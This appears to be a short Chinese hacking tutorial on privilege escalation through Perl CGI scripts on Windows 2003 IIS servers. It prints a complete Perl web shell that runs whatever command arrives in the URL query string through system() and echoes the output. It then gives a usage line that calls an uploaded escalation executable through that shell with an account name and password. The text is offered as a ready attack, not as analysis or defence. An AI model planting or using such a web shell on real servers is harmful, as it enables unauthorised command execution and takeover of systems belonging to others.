CGI PL PERL脚本 提权

windows 2003 下，安装ActivePerl-5.16.2.1602-MSWin32-x86-296513

 

IIS 添加CGI支持。并在对应网站配置下面，添加CGI后缀或PL后缀 与 对应的perlis.dll

 

此时，网站支持HTTP访问CGI 或者 .pl脚本。

 

可以用来提取，.CGI .PL权限比较大，大于ASPX。

 

首先上传CGI 提权执行脚本：

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$_ = $ENV{QUERY_STRING};

s/%20/ /ig;

s/%2f/\//ig;

$execthis = $_;

syswrite(STDOUT, "<HTML><PRE>\r\n", 13);

open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";

system($execthis);

syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);

close(STDERR);

close(STDOUT);

exit;

View Code

 

 

上传个提权EXE。 访问http://www.xxx.com/cmd.cgi?D:\www\seru_v.exe -u zhanghu -p mima 形式提权